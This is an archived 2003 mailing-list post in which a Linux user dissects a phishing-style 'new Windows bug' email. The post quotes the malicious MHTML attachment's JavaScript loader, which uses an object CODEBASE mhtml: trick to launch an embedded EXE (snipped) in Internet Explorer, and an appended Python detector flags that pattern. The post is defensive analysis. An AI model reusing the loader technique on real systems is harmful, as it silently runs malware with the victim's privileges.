Is this a new virus ?
From: Walter Dnes (waltdnes_at_waltdnes.org)
Date: 07/27/03
- Next message: The Other Guy: "[NEWS] Hacker code could unleash Windows worm"
- Previous message: Reticulum: "Please Help with WINCFG.SCR Infection !"
- Next in thread: John Elsbury: "Re: Is this a new virus ?"
- Reply: John Elsbury: "Re: Is this a new virus ?"
- Reply: Dave Korn: "Re: Is this a new virus ?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: 27 Jul 2003 17:17:43 GMT
I got the following in my inbox today. I've notified the abuse people at
swbell.net. Since I use linux on my home machine, I did some poking
around without fear. The headers and text portion of the message were...
> Received: from adsl-68-78-121-83.dsl.emhril.ameritech.net (HELO compuserve.com) (68.78.121.83)
> by manson.clss.net with SMTP;
> Fri, 25 Jul 2003 22:00:19 -0500
> Date: Sat, 26 Jul 2003 12:02:37 +0000
> From: Admin <admin@security.org>
> Subject: Newsletter
> To: Waltdnes <waltdnes@waltdnes.org>
> References: <6KAF6GEDBJLD9D31@waltdnes.org>
> In-Reply-To: <6KAF6GEDBJLD9D31@waltdnes.org>
> Message-ID: <LJ6L969A05305AB9@security.org>
> Reply-To: Admin <admin@security.org>
> Sender: Admin <admin@security.org>
> MIME-Version: 1.0
> Content-Type: multipart/mixed;
> +boundary="----=_NextPart_03CHDD7_H7_0B0F9F17L3EL45"
>
> [-- Attachment #1 --]
> [-- Type: text/plain, Encoding: 8bit, Size: 0.2K --]
> Content-Type: text/plain; charset=Windows-1251
> Content-Transfer-Encoding: 8bit
>
> Hello , waltdnes@waltdnes.org
>
>
> New windows bug was detected , details in readme.htm file (attached) !
>
> This is not spam ! , you get this letter because you are member of
> +www.security.org
>
> [-- Attachment #2: readme.zip --]
> [-- Type: text/plain, Encoding: base64, Size: 1.6K --]
> Content-Type: text/plain; name="readme.zip"
> Content-Transfer-Encoding: base64
> Content-Disposition: attachment; filename="readme.zip"
> Content-ID: <readme.zip>
They weren't kidding about "details in readme.htm file" either. I
unzipped it and the so-called "readme.htm" file began with...
> MIME-Version: 1.0
> Content-Location:file:///aaa.exe
> Content-Transfer-Encoding: base64
>
> TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAA
[...snip rest of EXE...]
Yes folks, an executable file. This was
followed by some funky javascript...
<body bgcolor=black scroll=no><script>
function f()
{s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));path=unescape(path);
document.write('<center><font color=red size=+5>Please wait loading
message ..... <body scroll=no bgcolor=black><object
classid="clsid:11111111-1111-1111-1111"
CODEBASE="mhtml:'+path+'\\readme.htm!file:///aaa.exe"></object>')}
setTimeout('f()',3000)</script>
I don't claim to understand javascript or Windows. Am I reading this
properly ? Opening "readme.htm" with IE will launch an EXE file ???
Since this is all done locally, I assume that what passes for "internet
security" on Windows won't be invoked, and the program will have the
full privileges of the user.
--
Walter Dnes <waltdnes@waltdnes.org>
Email users are divided into two classes;
1) Those who have effective spam-blocking
2) Those who wish they did
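A defender-side check for the attachment structure described in the post above, added here as an example and not part of the original message or its replies: it parses an MHTML file the way the poster did by hand, flags any part whose decoded body starts with the MZ magic, and flags HTML that instantiates an <object> whose CODEBASE is an mhtml: URL. The sample archive, its boundary and its path are constructed stand-ins.

```python
import base64
import email
import re
from email import policy

# Constructed sample standing in for the "readme.htm" described in the post:
# an MHTML archive with a base64 PE image addressed as file:///aaa.exe and an
# HTML part whose <object> CODEBASE points back into the archive with an
# mhtml: URL. The PE body is a stub (MZ magic plus zero bytes), not a program,
# and the boundary and path are made up.
PE_STUB_B64 = base64.b64encode(b"MZ\x90\x00" + bytes(60)).decode()
SAMPLE_MHTML = "\r\n".join([
    "MIME-Version: 1.0",
    'Content-Type: multipart/related; boundary="BOUND"',
    "",
    "--BOUND",
    "Content-Location: file:///aaa.exe",
    "Content-Transfer-Encoding: base64",
    "",
    PE_STUB_B64,
    "--BOUND",
    "Content-Type: text/html",
    "",
    "<body bgcolor=black><script>document.write('<object "
    'classid="clsid:11111111-1111-1111-1111" '
    'CODEBASE="mhtml:C:\\\\readme.htm!file:///aaa.exe"></object>\')</script>',
    "--BOUND--",
    "",
])

# <object ... CODEBASE="mhtml:...!file:///x.exe"> is the load vector to flag.
CODEBASE_MHTML = re.compile(r'CODEBASE\s*=\s*["\']?mhtml:', re.IGNORECASE)


def scan_mhtml(raw: str) -> list:
    """Walk an MHTML document and report embedded PE images and mhtml: CODEBASEs."""
    findings = []
    msg = email.message_from_string(raw, policy=policy.default)
    for part in msg.walk():
        if part.is_multipart():
            continue
        body = part.get_payload(decode=True) or b""  # base64 is undone here
        loc = part.get("Content-Location", "")
        # Check the bytes, not the declared type: the EXE was labelled text/plain.
        if body[:2] == b"MZ":
            findings.append(f"embedded PE image at Content-Location {loc or '(none)'}")
        if part.get_content_type() == "text/html" and CODEBASE_MHTML.search(body.decode("latin-1")):
            findings.append("object CODEBASE references an mhtml: URL (local executable load)")
    return findings


if __name__ == "__main__":
    for finding in scan_mhtml(SAMPLE_MHTML):
        print(finding)
```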